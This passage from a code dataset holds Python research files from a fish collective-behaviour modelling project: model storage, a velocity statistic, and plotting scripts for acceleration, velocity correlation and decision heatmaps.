argparse.ArgumentParser(\n description='Visualize the positions')\n parser.add_argument('--traj_visualisation_list',\n type=str,\n nargs='+',\n help='List of files to visualise',\n default='random',\n required=False)\n parser.add_argument('--exclude_index', '-e', type=int,\n help='Index of the virtual individual',\n required=False,\n default=-1)\n parser.add_argument('--timesteps', '-t', type=int,\n default=-1,\n help='Timesteps to use in the plot',\n required=False)\n parser.add_argument('--range', nargs='+',\n help='Vector containing the start and end index of trajectories to be plotted',\n required=False)\n parser.add_argument('--radius', '-r', type=float,\n help='Radius',\n default=0.25,\n required=False)\n parser.add_argument('--center',\n type=float,\n nargs='+',\n help='The centroidal coordinates for the setups used',\n default=[0.0, 0.0],\n required=False)\n args = parser.parse_args()\n\n plot(None, './', args)\n"
},
{
"alpha_fraction": 0.5763199329376221,
"alphanum_fraction": 0.5797176957130432,
"avg_line_length": 33.78181838989258,
"blob_id": "b5c454dfbb6e62128046f4089f9090389a50f956",
"content_id": "0da24b20ee81f88394071b9a9a97069e1bb4093f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3826,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 110,
"path": "/find/models/storage.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import os\nimport pickle\nimport shutil\nimport numpy as np\nimport tensorflow as tf\nimport torch\n\n\nclass ModelStorage:\n training_filename = 'training_{type}'\n val_filename = 'val_{type}'\n test_filename = 'test_{type}'\n\n training_path = '/train'\n val_path = '/val'\n test_path = '/test'\n checkpoint_path = '/model_checkpoint'\n logs_path = '/logs'\n\n def __init__(self, path, create_dirs=True):\n self._path = path\n\n if create_dirs:\n self.create_dirs(self._path + self.checkpoint_path)\n self.create_dirs(self._path + self.logs_path)\n self.create_dirs(self._path + self.training_path)\n self.create_dirs(self._path + self.val_path)\n self.create_dirs(self._path + self.test_path)\n\n def create_dirs(self, fullpath, remove_existing=False):\n if remove_existing and os.path.exists(fullpath):\n shutil.rmtree(fullpath)\n if not os.path.exists(fullpath):\n os.makedirs(fullpath)\n\n def _save_keras_model(self, model, epoch):\n if epoch >= 0:\n model.save(self._path + self.checkpoint_path + '/model_' +\n str(epoch) + '.h5')\n else:\n model.save(self._path + self.checkpoint_path + '/model.h5')\n\n def _load_keras_model(self, path, args):\n import find.models.tf_activations as tfa\n import find.models.tf_losses as tfl\n\n custom_objects = {\n 'Y': np.empty((0, 2)),\n }\n\n for k, v in tfl.losses.items():\n custom_objects[k] = v\n for k, v in tfa.activations.items():\n custom_objects[k] = v\n\n return tf.keras.models.load_model(path, custom_objects=custom_objects)\n\n def _load_trajnet_model(self, path, args):\n return torch.load(path)\n\n def save_model(self, model, model_backend, args, epoch=-1):\n if not epoch % args.dump == 0:\n return\n\n if model_backend == 'keras':\n self._save_keras_model(model, epoch)\n\n def load_model(self, path, model_backend, args):\n if model_backend == 'keras':\n return self._load_keras_model(path, args)\n if model_backend == 'trajnet':\n return self._load_trajnet_model(path, args)\n\n def save_sets(self, train, val, test):\n self.create_dirs(self._path + self.training_path, True)\n self.create_dirs(self._path + self.val_path, True)\n self.create_dirs(self._path + self.test_path, True)\n\n with open(self._path + self.training_path + '/' + self.training_filename.replace('{type}', 'inputs') + '.pkl', 'wb') as f:\n pickle.dump(train[0], f)\n\n with open(self._path + self.training_path + '/' + self.training_filename.replace('{type}', 'outputs') + '.pkl', 'wb') as f:\n pickle.dump(train[1], f)\n\n with open(self._path + self.val_path + '/' + self.val_filename.replace('{type}', 'inputs') + '.pkl', 'wb') as f:\n pickle.dump(val[0], f)\n\n with open(self._path + self.val_path + '/' + self.val_filename.replace('{type}', 'outputs') + '.pkl', 'wb') as f:\n pickle.dump(val[1], f)\n\n with open(self._path + self.test_path + '/' + self.test_filename.replace('{type}', 'inputs') + '.pkl', 'wb') as f:\n pickle.dump(test[0], f)\n\n with open(self._path + self.test_path + '/' + self.test_filename.replace('{type}', 'outputs') + '.pkl', 'wb') as f:\n pickle.dump(test[1], f)\n\n def get_training_path(self):\n return self._path + self.training_path\n\n def get_val_path(self):\n return self._path + self.val_path\n\n def get_test_path(self):\n return self._path + self.test_path\n\n def get_checkpoint_path(self):\n return self._path + self.checkpoint_path\n\n def get_logs_path(self):\n return self._path + self.logs_path\n"
},
{
"alpha_fraction": 0.5812336802482605,
"alphanum_fraction": 0.5881841778755188,
"avg_line_length": 31.885713577270508,
"blob_id": "2bb32493caa6c8e6182994d76727443424fa1494",
"content_id": "f6e4def10075175f79c5aa8897c5f418ab07abc6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1151,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 35,
"path": "/find/simulation/velocity_stat.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "from find.simulation.simu.stat.stat_base import StatBase\n\nimport numpy as np\nfrom pathlib import Path\n\n\nclass VelocityStat(StatBase):\n def __init__(self, dims, filename, dirname='', dump_period=-1):\n super().__init__(filename, dirname, dump_period)\n self._velocities = np.empty((0, dims))\n self._dims = dims\n\n def get_filename(self):\n return self._filename\n\n def get(self):\n return self._velocities\n\n def save(self):\n np.savetxt(Path(self._dirname).joinpath(\n self._filename), self._velocities)\n\n def __call__(self, simu):\n early_dump = self._dump_period > 0 and simu.get_current_iteration() % self._dump_period == 0\n\n if simu.get_num_iterations() == simu.get_current_iteration() + 1 or early_dump:\n appended_vel = np.empty(\n (simu.get_individuals()[0].get_velocity_history().shape[0], 0))\n for ind in simu.get_individuals():\n appended_vel = np.hstack(\n (appended_vel, ind.get_velocity_history()))\n self._velocities = appended_vel\n\n if early_dump:\n self.save()\n"
},
{
"alpha_fraction": 0.5039370059967041,
"alphanum_fraction": 0.5143821239471436,
"avg_line_length": 38.63694381713867,
"blob_id": "8f370281b80e7ac412863bebe88514affe5f7194",
"content_id": "22fa75c0e1a7c9afb4ab3f7559b280acff9e11f1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6223,
"license_type": "no_license",
"max_line_length": 176,
"num_lines": 157,
"path": "/find/plots/spatial/resultant_acceleration.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport glob\nimport argparse\n\nfrom find.utils.features import Accelerations, Velocities\nfrom find.utils.utils import compute_leadership\nfrom find.plots.common import *\n\n\ndef compute_resultant_acceleration(data, ax, args):\n lines = ['-', '--', ':']\n linecycler = cycle(lines)\n new_palette = []\n for p in uni_palette():\n new_palette.extend([p, p, p])\n colorcycler = cycle(sns.color_palette(new_palette))\n\n leadership = {}\n for k in sorted(data.keys()):\n p = data[k]['pos']\n v = data[k]['vel']\n leadership[k] = []\n for idx in range(len(p)):\n (_, leadership_timeseries) = compute_leadership(p[idx], v[idx])\n leadership[k].append(leadership_timeseries)\n\n plt.figure(figsize=(5, 5))\n ax = plt.gca()\n labels = []\n for k in sorted(data.keys()):\n if k == 'Hybrid':\n lines = [':']\n linecycler = cycle(lines)\n elif k == 'Virtual':\n lines = ['--']\n linecycler = cycle(lines)\n elif k == 'Real':\n lines = ['-']\n linecycler = cycle(lines)\n\n labels.append(k)\n leaders = leadership[k]\n acc = data[k]['acc']\n leader_dist = []\n follower_dist = []\n\n for idx in range(len(acc)):\n leadership_mat = np.array(leaders[idx])\n num_individuals = acc[idx].shape[1]\n for j in range(num_individuals):\n idx_leaders = np.where(leadership_mat[:, 1] == j)\n leader_dist += acc[idx][idx_leaders, j].tolist()[0]\n follower_idcs = list(range(num_individuals))\n follower_idcs.remove(j)\n for fidx in follower_idcs:\n follower_dist += acc[idx][idx_leaders, fidx].tolist()[0]\n\n print('Accelerations', k)\n print('LF: ', np.mean(leader_dist+follower_dist),\n np.std(leader_dist+follower_dist))\n print('L: ', np.mean(leader_dist),\n np.std(leader_dist))\n print('F: ', np.mean(follower_dist),\n np.std(follower_dist))\n\n ax = sns.kdeplot(leader_dist + follower_dist, ax=ax, color=next(colorcycler),\n linestyle=next(linecycler), label=k, linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=[0.0, 1.8], bw_adjust=0.15, cut=-1)\n ax = sns.kdeplot(leader_dist, ax=ax, color=next(colorcycler),\n linestyle=next(linecycler), label='Leader (' + k + ')', linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=[0.0, 1.8], bw_adjust=0.15, cut=-1)\n ax = sns.kdeplot(follower_dist, ax=ax, color=next(colorcycler),\n linestyle=next(linecycler), label='Follower (' + k + ')', linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=[0.0, 1.8], bw_adjust=0.15, cut=-1)\n return ax\n\n\ndef plot(exp_files, path, args):\n data = {}\n for e in sorted(exp_files.keys()):\n pos = glob.glob(args.path + '/' + exp_files[e])\n if len(pos) == 0:\n continue\n data[e] = {}\n data[e]['pos'] = []\n data[e]['vel'] = []\n data[e]['acc'] = []\n for p in pos:\n positions = np.loadtxt(p) * args.radius\n velocities = Velocities([positions], args.timestep).get()[0]\n accelerations = Accelerations([velocities], args.timestep).get()[0]\n linear_acceleration = np.array((accelerations.shape[0], 1))\n tup = []\n for i in range(accelerations.shape[1] // 2):\n linear_acceleration = np.sqrt(accelerations[:, i * 2] ** 2 + accelerations[:, i * 2 + 1] ** 2\n - 2 * np.abs(accelerations[:, i * 2]) * np.abs(accelerations[:, i * 2 + 1]) * np.cos(\n np.arctan2(accelerations[:, i * 2 + 1], accelerations[:, i * 2]))).tolist()\n tup.append(linear_acceleration)\n data[e]['acc'].append(np.array(tup).T)\n data[e]['pos'].append(positions)\n data[e]['vel'].append(velocities)\n\n _ = plt.figure(figsize=(5, 5))\n ax = plt.gca()\n\n ax = compute_resultant_acceleration(data, ax, args)\n\n ax.set_xlabel(r'$\\alpha$ ($m/s^2$)')\n ax.set_ylabel('PDF')\n ax.legend()\n ax.set_xlim([-0.09, 1.8])\n plt.savefig(path + 'linear_acceleration.png')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Resultant acceleration histogram figure')\n parser.add_argument('--path', '-p', type=str,\n help='Path to data directory',\n required=True)\n parser.add_argument('--timestep', '-t', type=float,\n help='Timestep',\n required=True)\n parser.add_argument('--radius', '-r', type=float,\n help='Raidus',\n default=0.25,\n required=False)\n parser.add_argument('--kde_gridsize',\n type=int,\n help='Grid size for kernel density estimation plots',\n default=1500,\n required=False)\n parser.add_argument('--type',\n nargs='+',\n default=['Real', 'Hybrid', 'Virtual'],\n choices=['Real', 'Hybrid', 'Virtual'])\n parser.add_argument('--original_files',\n type=str,\n default='raw/*processed_positions.dat',\n required=False)\n parser.add_argument('--hybrid_files',\n type=str,\n default='generated/*generated_positions.dat',\n required=False)\n parser.add_argument('--virtual_files',\n type=str,\n default='generated/*generated_virtu_positions.dat',\n required=False)\n args = parser.parse_args()\n\n exp_files = {}\n for t in args.type:\n if t == 'Real':\n exp_files[t] = args.original_files\n elif t == 'Hybrid':\n exp_files[t] = args.hybrid_files\n elif t == 'Virtual':\n exp_files[t] = args.virtual_files\n\n plot(exp_files, './', args)\n"
},
{
"alpha_fraction": 0.49033188819885254,
"alphanum_fraction": 0.5051947832107544,
"avg_line_length": 35.66666793823242,
"blob_id": "2241e53ac65106d0fb3901757ac524fdd9a7565a",
"content_id": "0686a4e966b77e31cd7e731b9508cea5ec260045",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6930,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 189,
"path": "/find/plots/correlation/velocity_correlation.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport glob\nimport argparse\nfrom tqdm import tqdm\n\nfrom find.utils.features import Velocities\nfrom find.utils.utils import compute_leadership\nfrom find.plots.common import *\n\n\ndef compute_correlation(data, tcor, ntcor, dtcor, ntcorsup, args):\n cor_l = np.zeros(shape=(ntcorsup, 1))\n cor_f = np.zeros(shape=(ntcorsup, 1))\n ndata = np.ones(shape=(ntcorsup, 1))\n\n for it in range(data[0].shape[0]):\n if (it+1) % 5000 == 0:\n print('At iteration {} out of {}'.format(it+1, data[0].shape[0]))\n for itcor in range(ntcorsup):\n itp = it + itcor * ntcor\n if (itp < data[0].shape[0]):\n cor0 = data[0][it, 1] * data[0][itp, 1] + \\\n data[0][it, 0] * data[0][itp, 0]\n cor_l[itcor] += cor0\n\n cor0 = data[1][it, 1] * data[1][itp, 1] + \\\n data[1][it, 0] * data[1][itp, 0]\n cor_f[itcor] += cor0\n\n ndata[itcor] += 1\n\n return (cor_l, cor_f), ndata\n\n\ndef corv(data, ax, args):\n lines = ['-', '--', ':']\n linecycler = cycle(lines)\n new_palette = uni_palette()\n # new_palette *= 3\n colorcycler = cycle(sns.color_palette(new_palette))\n\n leadership = {}\n for k in sorted(data.keys()):\n p = data[k]['pos']\n v = data[k]['vel']\n leadership[k] = []\n for idx in range(len(p)):\n (_, leadership_timeseries) = compute_leadership(p[idx], v[idx])\n leadership[k].append(leadership_timeseries)\n\n for k in sorted(data.keys()):\n leaders = leadership[k]\n velocities = data[k]['vel']\n leader_velocities = []\n follower_velocities = []\n\n for idx in range(len(velocities)):\n leadership_mat = np.array(leaders[idx])\n lvel = np.copy(velocities[idx][:, :2])\n fvel = np.copy(velocities[idx][:, 2:])\n\n idx_leaders_0 = np.where(leadership_mat[:, 1] == 0)\n idx_leaders_1 = np.where(leadership_mat[:, 1] == 1)\n\n lvel[idx_leaders_0, 0] = velocities[idx][idx_leaders_0, 0]\n lvel[idx_leaders_0, 1] = velocities[idx][idx_leaders_0, 1]\n lvel[idx_leaders_1, 0] = velocities[idx][idx_leaders_1, 2]\n lvel[idx_leaders_1, 1] = velocities[idx][idx_leaders_1, 3]\n\n fvel[idx_leaders_0, 0] = velocities[idx][idx_leaders_0, 2]\n fvel[idx_leaders_0, 1] = velocities[idx][idx_leaders_0, 3]\n fvel[idx_leaders_1, 0] = velocities[idx][idx_leaders_1, 0]\n fvel[idx_leaders_1, 1] = velocities[idx][idx_leaders_1, 1]\n\n leader_velocities.append(lvel)\n follower_velocities.append(fvel)\n\n if k == 'Robot':\n dtcor = args.ntcor * 0.1\n else:\n dtcor = args.ntcor * args.timestep\n ntcorsup = int(args.tcor / dtcor)\n\n cor_l = np.zeros(shape=(ntcorsup, 1))\n cor_f = np.zeros(shape=(ntcorsup, 1))\n ndata = np.ones(shape=(ntcorsup, 1))\n\n for i in tqdm(range(len(velocities)), desc='Processing {}'.format(k), leave=True):\n c, n = compute_correlation(\n (leader_velocities[i], follower_velocities[i]), args.tcor, args.ntcor, dtcor, ntcorsup, args)\n cor_l += c[0]\n cor_f += c[1]\n ndata += n\n\n if k == 'Robot':\n time = np.array(range(ntcorsup)) * 0.1\n else:\n time = np.array(range(ntcorsup)) * args.timestep\n\n ccolour = next(colorcycler)\n ts = (cor_l + cor_f) / (2*ndata)\n ax = sns.lineplot(x=time.tolist(), y=ts.T.tolist()[0], ax=ax, color=ccolour,\n linestyle=next(linecycler), label=k)\n ts = cor_l / ndata\n ax = sns.lineplot(x=time.tolist(), y=ts.T.tolist()[0], ax=ax, color=ccolour,\n linestyle=next(linecycler), label='Leader (' + k + ')')\n ts = cor_f / ndata\n ax = sns.lineplot(x=time.tolist(), y=ts.T.tolist()[0], ax=ax, color=ccolour,\n linestyle=next(linecycler), label='Follower (' + k + ')')\n return ax\n\n\ndef plot(exp_files, path, args):\n data = {}\n for e in sorted(exp_files.keys()):\n pos = glob.glob(args.path + '/' + exp_files[e])\n if len(pos) == 0:\n continue\n data[e] = {}\n data[e]['pos'] = []\n data[e]['vel'] = []\n for p in pos:\n positions = np.loadtxt(p) * args.radius\n velocities = Velocities([positions], args.timestep).get()[0]\n data[e]['pos'].append(positions)\n data[e]['vel'].append(velocities)\n\n _ = plt.figure(figsize=(5, 5))\n ax = plt.gca()\n\n ax = corv(data, ax, args)\n\n ax.set_xlabel('$t$ (s)')\n ax.set_ylabel(r'$<V(t) \\dot V(0)>$')\n ax.legend()\n plt.savefig(path + 'corv.png')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Velocity correlation figure')\n parser.add_argument('--path', '-p', type=str,\n help='Path to data directory',\n required=True)\n parser.add_argument('--timestep', '-t', type=float,\n help='Timestep',\n required=True)\n parser.add_argument('--radius', '-r', type=float,\n help='Raidus',\n default=0.25,\n required=False)\n parser.add_argument('--tcor',\n type=float,\n default=25.0,\n help='Time window to consider when computing correlation metrics',\n required=False)\n parser.add_argument('--ntcor',\n type=int,\n default=1,\n help='Number of timesteps to includ in the correlation metrics computaion',\n required=False)\n parser.add_argument('--type',\n nargs='+',\n default=['Real', 'Hybrid', 'Virtual'],\n choices=['Real', 'Hybrid', 'Virtual'])\n parser.add_argument('--original_files',\n type=str,\n default='raw/*processed_positions.dat',\n required=False)\n parser.add_argument('--hybrid_files',\n type=str,\n default='generated/*generated_positions.dat',\n required=False)\n parser.add_argument('--virtual_files',\n type=str,\n default='generated/*generated_virtu_positions.dat',\n required=False)\n args = parser.parse_args()\n\n exp_files = {}\n for t in args.type:\n if t == 'Real':\n exp_files[t] = args.original_files\n elif t == 'Hybrid':\n exp_files[t] = args.hybrid_files\n elif t == 'Virtual':\n exp_files[t] = args.virtual_files\n\n plot(exp_files, './', args)\n"
},
{
"alpha_fraction": 0.46389904618263245,
"alphanum_fraction": 0.4964533746242523,
"avg_line_length": 34.81016159057617,
"blob_id": "b180d92bf83dbe70ad4a8ddb8a0e15d46dafd9fb",
"content_id": "cb64a884abb2603f0b10e3d6d2ff916ee7ba30ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13393,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 374,
"path": "/find/plots/trajectory_visualisation/plot_decision_heatmap_multi.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nfrom utils.losses import *\nimport tensorflow as tf\nfrom PIL import Image\nfrom matplotlib.colors import ListedColormap\nimport matplotlib.pyplot as plt\nfrom pathlib import Path\nimport seaborn as sns\nimport numpy as np\nimport argparse\nimport tqdm\nimport glob\nimport os\nimport matplotlib\n\nmatplotlib.use('Agg')\n\n\nplt.style.use('dark_background')\n\niradius = 0.655172413793\noradius = 1.0\ncenter = (0, 0)\nradius = (iradius, oradius)\n\n# if args.dark:\nimage_path = os.getcwd() + '/plots/fish_dark.png'\n# else:\n# image_path = os.getcwd() + '/plots/fish.png'\nimage = Image.open(image_path)\nimage_path = os.getcwd() + '/plots/excluded.png'\nexcluded_image = Image.open(image_path)\nimage_path = os.getcwd() + '/plots/excluded_t_1.png'\nexcluded_image_t_1 = Image.open(image_path)\nimage_path = os.getcwd() + '/plots/robot.png'\nrimage = Image.open(image_path)\n\n\ndef angle_to_pipi(dif):\n while True:\n if dif < -np.pi:\n dif += 2. * np.pi\n if dif > np.pi:\n dif -= 2. * np.pi\n if (np.abs(dif) <= np.pi):\n break\n return dif\n\n\nclass CircularCorridor:\n def __init__(self, radius=1.0, center=(0, 0)):\n self._center = center\n self._radius = radius\n\n def is_valid(self, radius):\n return radius < self._radius and radius > 0\n\n def center(self):\n return self._center\n\n\ndef cart_sim(model, setup, args):\n global radius, center\n\n inputs = None\n outputs = None\n p = np.loadtxt(args.reference)\n v = np.loadtxt(args.reference.replace('positions', 'velocities'))\n assert p.shape == v.shape, 'Dimensions don\\'t match'\n\n pos_t = np.roll(p, shift=1, axis=0)[2:, :]\n pos_t_1 = np.roll(p, shift=1, axis=0)[1:-1, :]\n vel_t = np.roll(v, shift=1, axis=0)[2:, :]\n vel_t_1 = np.roll(v, shift=1, axis=0)[1:-1, :]\n\n if args.iterations < 0:\n iters = p.shape[0]\n else:\n iters = args.iterations\n\n bins = 1000\n m_y, m_x = np.meshgrid(np.linspace(center[0] - (oradius + 0.0001),\n center[0] + (oradius + 0.0001), bins),\n np.linspace(center[1] - (oradius + 0.0001),\n center[1] + (oradius + 0.0001), bins))\n r = np.sqrt((m_x - center[0]) ** 2 + (m_y - center[1]) ** 2)\n outside_els = np.sum(r > radius[1])\n\n for t in tqdm.tqdm(range(iters)):\n fig = plt.figure(figsize=(6, 7))\n ax = plt.gca()\n\n radius = (iradius, oradius)\n if args.dark:\n color = 'white'\n else:\n color = 'black'\n inner = plt.Circle(\n center, radius[0], color=color, fill=False)\n outer = plt.Circle(\n center, radius[1], color=color, fill=False)\n ax.add_artist(outer)\n\n z = np.zeros([bins, bins])\n\n for fidx in range(p.shape[1] // 2):\n X = []\n X.append(pos_t_1[t, fidx * 2])\n X.append(pos_t_1[t, fidx * 2 + 1])\n X.append(vel_t_1[t, fidx * 2])\n X.append(vel_t_1[t, fidx * 2 + 1])\n\n Y = []\n Y.append(vel_t[t, fidx * 2])\n Y.append(vel_t[t, fidx * 2 + 1])\n\n for nidx in range(p.shape[1] // 2):\n if nidx == fidx:\n continue\n X.append(pos_t_1[t, nidx * 2])\n X.append(pos_t_1[t, nidx * 2 + 1])\n X.append(vel_t_1[t, nidx * 2])\n X.append(vel_t_1[t, nidx * 2 + 1])\n\n X = np.array([X])\n Y = np.array([Y])\n\n prediction = np.array(model.predict(X))\n\n def logbound(val, max_logvar=0, min_logvar=-10):\n logsigma = max_logvar - \\\n np.log(np.exp(max_logvar - val) + 1)\n logsigma = min_logvar + \\\n np.log(np.exp(logsigma - min_logvar) + 1)\n return logsigma\n\n prediction[0, 2:] = list(map(logbound, prediction[0, 2:]))\n prediction[0, 2:] = list(map(np.exp, prediction[0, 2:]))\n\n for _ in range(args.sample_size):\n sample_velx = np.random.normal(\n prediction[0, 0], prediction[0, 2], 1)[0]\n sample_vely = np.random.normal(\n prediction[0, 1], prediction[0, 3], 1)[0]\n\n x_hat = pos_t_1[t, fidx * 2] + sample_velx * args.timestep\n y_hat = pos_t_1[t, fidx * 2 + 1] + sample_vely * args.timestep\n\n dist_x = np.abs(np.array(x_hat - m_x[:, 0]))\n dist_y = np.abs(np.array(y_hat - m_y[0, :]))\n min_xidx = np.argmin(dist_x)\n min_yidx = np.argmin(dist_y)\n z[min_xidx, min_yidx] += 1\n\n if not args.fish_like:\n ax.add_artist(plt.Circle(\n (pos_t_1[t, fidx * 2], pos_t_1[t, fidx * 2 + 1]), 0.01, color='white', fill=False))\n ax.add_artist(plt.Circle(\n (pos_t[t, fidx * 2], pos_t[t, fidx * 2 + 1]), 0.01, color='green', fill=False))\n\n if args.fish_like:\n phi = np.arctan2(vel_t_1[t, fidx * 2 + 1],\n vel_t_1[t, fidx * 2]) * 180 / np.pi\n rotated_img = image.rotate(phi)\n ax.imshow(rotated_img, extent=[pos_t_1[t, fidx * 2] - 0.05, pos_t_1[t, fidx * 2] + 0.05, pos_t_1[t, fidx * 2 + 1] -\n 0.05, pos_t_1[t, fidx * 2 + 1] + 0.05], aspect='equal', zorder=1)\n\n z /= (iters * (p.shape[1] // 2))\n z_min, z_max = 0, 0.0011\n\n palette = sns.color_palette('RdYlBu_r', 1000)\n palette = [(0, 0, 0, 0)] + palette\n sns.set_palette(palette)\n palette = sns.color_palette()\n cmap = ListedColormap(palette.as_hex())\n\n c = ax.pcolormesh(m_x, m_y, z, cmap=cmap, vmin=z_min, vmax=z_max)\n fig.colorbar(c, ax=ax, label='Cell occupancy (%)',\n orientation='horizontal', pad=0.05)\n\n # ax.axis('off')\n ax.set_xlim([-1.1, 1.1])\n ax.set_ylim([-1.1, 1.1])\n plt.tight_layout()\n png_fname = args.out_dir + '/' + str(t).zfill(6)\n plt.savefig(\n str(png_fname) + '.png',\n transparent=True,\n dpi=300\n )\n plt.close('all')\n\n\ndef polar_sim(model, setup, args):\n global radius, center\n\n inputs = None\n outputs = None\n p = np.loadtxt(args.reference)\n vel = np.loadtxt(args.reference.replace('positions', 'velocities'))\n timestep = args.timestep\n\n pos_t = np.roll(p, shift=1, axis=0)[2:, :]\n rad_t = np.sqrt((pos_t[:, 0] - setup.center()[0]) **\n 2 + (pos_t[:, 1] - setup.center()[1]) ** 2)\n\n pos_t_1 = np.roll(p, shift=1, axis=0)[1:-1, :]\n rad_t_1 = np.sqrt((pos_t_1[:, 0] - setup.center()[0])\n ** 2 + (pos_t_1[:, 1] - setup.center()[1]) ** 2)\n\n vel_t = (p - np.roll(p, shift=1, axis=0))[2:, :] / timestep\n radial_vel_t = (pos_t[:, 0] * vel_t[:, 1] - pos_t[:, 1]\n * vel_t[:, 0]) / (pos_t[:, 0] ** 2 + pos_t[:, 1] ** 2)\n hdg_t = np.array(\n list(map(angle_to_pipi, np.arctan2(vel_t[:, 1], vel_t[:, 0]))))\n\n vel_t_1 = (p - np.roll(p, shift=1, axis=0))[1:-1, :] / timestep\n radial_vel_t_1 = (pos_t_1[:, 0] * vel_t_1[:, 1] - pos_t_1[:, 1]\n * vel_t_1[:, 0]) / (pos_t_1[:, 0] ** 2 + pos_t_1[:, 1] ** 2)\n hdg_t_1 = np.array(\n list(map(angle_to_pipi, np.arctan2(vel_t_1[:, 1], vel_t_1[:, 0]))))\n\n X = np.array([rad_t_1, np.cos(hdg_t_1), np.sin(\n hdg_t_1), vel_t_1[:, 0], vel_t_1[:, 1]])\n Y = np.array([(rad_t-rad_t_1) / timestep, radial_vel_t])\n inputs = X\n outputs = Y\n\n X = X.transpose()\n Y = Y.transpose()\n\n if args.iterations < 0:\n iters = p.shape[0]\n else:\n iters = args.iterations\n\n bins = 1000\n m_y, m_x = np.meshgrid(np.linspace(center[0] - (oradius + 0.0001),\n center[0] + (oradius + 0.0001), bins),\n np.linspace(center[1] - (oradius + 0.0001),\n center[1] + (oradius + 0.0001), bins))\n r = np.sqrt((m_x - center[0]) ** 2 + (m_y - center[1]) ** 2)\n outside_els = np.sum(r > radius[1])\n\n for t in tqdm.tqdm(range(iters)):\n fig = plt.figure(figsize=(6, 7))\n ax = plt.gca()\n\n radius = (iradius, oradius)\n if args.dark:\n color = 'white'\n else:\n color = 'black'\n inner = plt.Circle(\n center, radius[0], color=color, fill=False)\n outer = plt.Circle(\n center, radius[1], color=color, fill=False)\n ax.add_artist(outer)\n\n z = np.zeros([bins, bins])\n\n prediction = np.array(model.predict(X[t].reshape(1, X.shape[1])))\n\n def logbound(val, max_logvar=0, min_logvar=-10):\n logsigma = max_logvar - \\\n np.log(np.exp(max_logvar - val) + 1)\n logsigma = min_logvar + np.log(np.exp(logsigma - min_logvar) + 1)\n return logsigma\n\n prediction[0, 2:] = list(map(logbound, prediction[0, 2:]))\n prediction[0, 2:] = list(map(np.exp, prediction[0, 2:]))\n\n for _ in range(args.sample_size):\n sample_velx = np.random.normal(\n prediction[0, 0], prediction[0, 2], 1)[0]\n sample_vely = np.random.normal(\n prediction[0, 1], prediction[0, 3], 1)[0]\n\n x_hat = pos_t_1[t, 0] + sample_velx * args.timestep\n y_hat = pos_t_1[t, 1] + sample_vely * args.timestep\n\n dist_x = np.abs(np.array(x_hat - m_x[:, 0]))\n dist_y = np.abs(np.array(y_hat - m_y[0, :]))\n min_xidx = np.argmin(dist_x)\n min_yidx = np.argmin(dist_y)\n z[min_xidx, min_yidx] += 1\n\n z /= iters\n z_min, z_max = 0, 0.0011\n\n if not args.fish_like:\n ax.add_artist(plt.Circle(\n (pos_t_1[t, 0], pos_t_1[t, 1]), 0.01, color='white', fill=False))\n ax.add_artist(plt.Circle(\n (pos_t[t, 0], pos_t[t, 1]), 0.01, color='green', fill=False))\n\n if args.fish_like:\n phi = np.arctan2(vel[t, 1], vel[t, 0]) * 180 / np.pi\n rotated_img = image.rotate(phi)\n ax.imshow(rotated_img, extent=[pos_t_1[t, 0] - 0.03, pos_t_1[t, 0] + 0.03, pos_t_1[t, 1] -\n 0.03, pos_t_1[t, 1] + 0.03], aspect='equal', zorder=1)\n\n palette = sns.color_palette('RdYlBu_r', 1000)\n palette = [(0, 0, 0, 0)] + palette\n sns.set_palette(palette)\n palette = sns.color_palette()\n cmap = ListedColormap(palette.as_hex())\n\n c = ax.pcolormesh(m_x, m_y, z, cmap=cmap, vmin=z_min, vmax=z_max)\n fig.colorbar(c, ax=ax, label='Cell occupancy (%)',\n orientation='horizontal', pad=0.05)\n\n # ax.axis('off')\n ax.set_xlim([-1.1, 1.1])\n ax.set_ylim([-1.1, 1.1])\n plt.tight_layout()\n png_fname = args.out_dir + '/' + str(t).zfill(6)\n plt.savefig(\n str(png_fname) + '.png',\n transparent=True,\n dpi=300\n )\n plt.close('all')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Visualize the decision heatmap for probabilistic models')\n parser.add_argument('--path', '-p', type=str,\n help='Path to the experiment',\n required=True)\n parser.add_argument('--reference', '-r', type=str,\n help='Path to a reference experiment position file',\n required=True)\n parser.add_argument('--timestep', '-t', type=float,\n help='Simulation timestep',\n required=True)\n parser.add_argument('--polar', action='store_true',\n help='Use polar inputs instead of cartesian coordinates',\n default=False)\n parser.add_argument('--model', '-m', type=str,\n help='Model file name to use',\n required=True)\n parser.add_argument('--iterations', '-i', type=int,\n help='Number of iteration of the simulation',\n required=False,\n default=-1)\n parser.add_argument('--sample-size', '-s', type=int,\n help='Samples to draw for the velocity distribution',\n required=False,\n default=1000)\n parser.add_argument('--dark', action='store_true',\n help='Render dark friendly icons',\n default=False)\n parser.add_argument('--out-dir', '-o', type=str,\n help='Output directory name',\n required=True)\n parser.add_argument('--fish-like', action='store_true',\n help='Images instead of points',\n default=False)\n args = parser.parse_args()\n\n model = tf.keras.models.load_model(Path(args.path).joinpath(args.model + '_model.h5'), custom_objects={\n 'gaussian_nll': gaussian_nll, 'gaussian_mse': gaussian_mse, 'gaussian_mae': gaussian_mae})\n setup = 